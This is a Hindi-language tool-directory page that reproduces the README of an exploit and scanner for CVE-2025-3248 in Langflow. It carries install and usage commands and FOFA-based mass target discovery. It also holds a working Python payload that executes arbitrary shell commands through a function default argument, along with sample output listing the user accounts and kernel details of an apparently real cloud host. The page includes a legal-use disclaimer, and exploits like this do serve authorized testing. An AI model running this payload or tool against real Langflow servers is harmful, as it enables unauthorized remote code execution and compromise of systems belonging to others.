Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-3248 — Langflow अनुप्रयोगों में CVE-2025-3248 के लिए एक भेद्यता स्कैनर। Langflow अनुप्रयोगों में CVE-2025-3248 भेद्यता को स्कैन करने के लिए एक उपकरण। | Kitploit
उपकरण/GitHubGitHub/xuemian168/cve-2025-3248
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनाकमांड एंड कंट्रोल
GitHubxuemian168/cve-2025-3248

CVE-2025-3248

Langflow अनुप्रयोगों में CVE-2025-3248 के लिए एक भेद्यता स्कैनर। Langflow अनुप्रयोगों में CVE-2025-3248 भेद्यता को स्कैन करने के लिए एक उपकरण।

रिपॉजिटरी देखें
10211 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

中文 | English

Langflow भेद्यता स्कैनर

Langflow एप्लिकेशन में CVE-2025-3248 के लिए एक भेद्यता स्कैनर।

विशेषताएं

  • एकल लक्ष्य या FOFA का उपयोग करके एकाधिक लक्ष्यों को स्कैन करें
  • असुरक्षित लक्ष्यों पर सिस्टम कमांड निष्पादित करें
  • सिस्टम जानकारी प्राप्त करें
  • कस्टम पेलोड समर्थन
  • FOFA स्कैनिंग के लिए प्रगति पट्टी
  • सुंदर CLI इंटरफ़ेस

स्थापना

  1. रिपॉजिटरी क्लोन करें:
root@kitploit:~
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
  1. निर्भरताएँ स्थापित करें:
root@kitploit:~
python3 -m venv venv
source venv/bin/active
pip install -r requirements.txt
  1. पर्यावरण फ़ाइल संपादित करें (वैकल्पिक)
root@kitploit:~
# Edit करने के बाद
mv .env.example .env

उपयोग

एकल लक्ष्य स्कैन

root@kitploit:~
python main.py -t https://target.com

FOFA API का उपयोग करना

root@kitploit:~
python main.py --fofa-email [email protected] --fofa-key your_api_key

अतिरिक्त विकल्प

  • -t, --target: स्कैन करने का लक्ष्य URL
  • --fofa-email: FOFA API ईमेल
  • --fofa-key: FOFA API कुंजी
  • --fofa-query: FOFA खोज क्वेरी (डिफ़ॉल्ट: 'app="LOGSPACE-LangFlow"')
  • --country: देश कोड द्वारा परिणाम फ़िल्टर करें (जैसे, CN, US)
  • --max-pages: प्राप्त करने के लिए FOFA पृष्ठों की अधिकतम संख्या (डिफ़ॉल्ट: 5)
  • --page-size: प्रति पृष्ठ परिणाम (डिफ़ॉल्ट: 100)
  • --timeout: सेकंड में अनुरोध समय सीमा (डिफ़ॉल्ट: 10)
  • --no-verify: SSL सत्यापन अक्षम करें
  • --threads: समवर्ती स्कैनिंग के लिए थ्रेड की संख्या (डिफ़ॉल्ट: 5)
  • -f, --file: पेलोड के रूप में उपयोग करने के लिए कस्टम Python फ़ाइल

कस्टम पेलोड

आप एक Python फ़ाइल बनाकर कस्टम पेलोड बना सकते हैं:

root@kitploit:~
def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
    pass

फिर इसका उपयोग करें:

root@kitploit:~
python main.py -t https://target.com -f your_payload.py

आउटपुट उदाहरण

root@kitploit:~
    [+] User Accounts:
        root            UID:0      GID:0      Home:/root                Shell:/bin/bash
        daemon          UID:1      GID:1      Home:/usr/sbin            Shell:/usr/sbin/nologin
        bin             UID:2      GID:2      Home:/bin                 Shell:/usr/sbin/nologin
        sys             UID:3      GID:3      Home:/dev                 Shell:/usr/sbin/nologin
        sync            UID:4      GID:65534  Home:/bin                 Shell:/bin/sync
        games           UID:5      GID:60     Home:/usr/games           Shell:/usr/sbin/nologin
        man             UID:6      GID:12     Home:/var/cache/man       Shell:/usr/sbin/nologin
        lp              UID:7      GID:7      Home:/var/spool/lpd       Shell:/usr/sbin/nologin
        mail            UID:8      GID:8      Home:/var/mail            Shell:/usr/sbin/nologin
        news            UID:9      GID:9      Home:/var/spool/news      Shell:/usr/sbin/nologin
        uucp            UID:10     GID:10     Home:/var/spool/uucp      Shell:/usr/sbin/nologin
        proxy           UID:13     GID:13     Home:/bin                 Shell:/usr/sbin/nologin
        www-data        UID:33     GID:33     Home:/var/www             Shell:/usr/sbin/nologin
        backup          UID:34     GID:34     Home:/var/backups         Shell:/usr/sbin/nologin
        list            UID:38     GID:38     Home:/var/list            Shell:/usr/sbin/nologin
        irc             UID:39     GID:39     Home:/run/ircd            Shell:/usr/sbin/nologin
        _apt            UID:42     GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        nobody          UID:65534  GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        user            UID:1000   GID:0      Home:/app/data            Shell:/bin/sh
root@kitploit:~
    [+] System Details:
        Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux

अस्वीकरण

⚠️ अस्वीकरण यह उपकरण केवल कानूनी उद्देश्यों के लिए है। इसे शैक्षिक उद्देश्यों, आंतरिक उद्यम सुरक्षा परीक्षण, या अधिकृत वातावरण में उपयोग के लिए डिज़ाइन किया गया है। किसी भी अनधिकृत सिस्टम, नेटवर्क या डिवाइस पर इस उपकरण का उपयोग सख्त वर्जित है, अन्यथा यह प्रासंगिक कानूनों और विनियमों का उल्लंघन कर सकता है।

उपयोगकर्ता अपने कार्यों की सभी कानूनी जिम्मेदारी वहन करेंगे। लेखक और योगदानकर्ता इस उपकरण के अनुचित उपयोग के कारण होने वाली किसी भी हानि, डेटा रिसाव या कानूनी परिणामों के लिए जिम्मेदार नहीं हैं।

⚠️ अवैध हमलों के लिए उपयोग न करें। अनधिकृत सिस्टम पर इस उपकरण को तैनात या चलाने का प्रयास न करें।

संदर्भ

  • https://github.com/langflow-ai/langflow/releases/tag/1.3.0
  • https://github.com/langflow-ai/langflow/pull/6911
  • https://www.cve.org/cverecord?id=CVE-2025-3248

लाइसेंस

MIT License

टूल डाउनलोड करें